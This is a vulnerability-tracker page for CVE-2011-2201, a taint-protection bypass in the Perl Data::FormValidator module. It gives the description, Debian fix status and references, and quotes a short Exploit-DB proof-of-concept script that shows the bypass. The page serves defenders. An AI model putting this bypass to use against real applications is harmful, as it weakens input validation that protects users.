CVE-2011-2201
Description
The Data::FormValidator module 4.66 and earlier for Perl, when untaint_all_constraints is enabled, does not properly preserve the taint attribute of data, which might allow remote attackers to bypass the taint protection mechanism via form input.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Perl Data::FormValidator 4.66 Module - 'results()' Security Bypass
source: https://www.securityfocus.com/bid/48167/info
The Perl Data::FormValidator module is prone to a security-bypass vulnerability.
An attacker can exploit this issue to bypass certain security restrictions and obtain potentially sensitive information.
Data::FormValidator 4.66 is vulnerable; other versions may also be affected.
#!/opt/perl/5.12/bin/perl
use strict;
use warnings;
use Data::FormValidator;
"some_unrelated_string" =~ m/^.*$/;
my $profile = {
untaint_all_constraints => 1,
required => [qw(a)],
constraint_methods => {
a => qr/will_never_match/,
},
};
my $results = Data::FormValidator->check({ a => 1 }, $profile);
warn $results->valid('a');OS impact
Debian Fixed 5 releases
| Version | Status | Fixed in |
|---|---|---|
| trixie | Fixed | 4.66-3 |
| sid | Fixed | 4.66-3 |
| forky | Fixed | 4.66-3 |
| bullseye | Fixed | 4.66-3 |
| bookworm | Fixed | 4.66-3 |
References
- http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=629511
- http://lists.fedoraproject.org/pipermail/package-announce/2011-September/065416.html
- http://www.openwall.com/lists/oss-security/2011/06/12/3
- http://www.openwall.com/lists/oss-security/2011/06/13/13
- http://www.openwall.com/lists/oss-security/2011/06/13/5
- http://www.securityfocus.com/bid/48167
- https://bugzilla.redhat.com/show_bug.cgi?id=712694
- https://rt.cpan.org/Public/Bug/Display.html?id=61792
- https://security-tracker.debian.org/tracker/CVE-2011-2201
CWEs
CWE-264
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.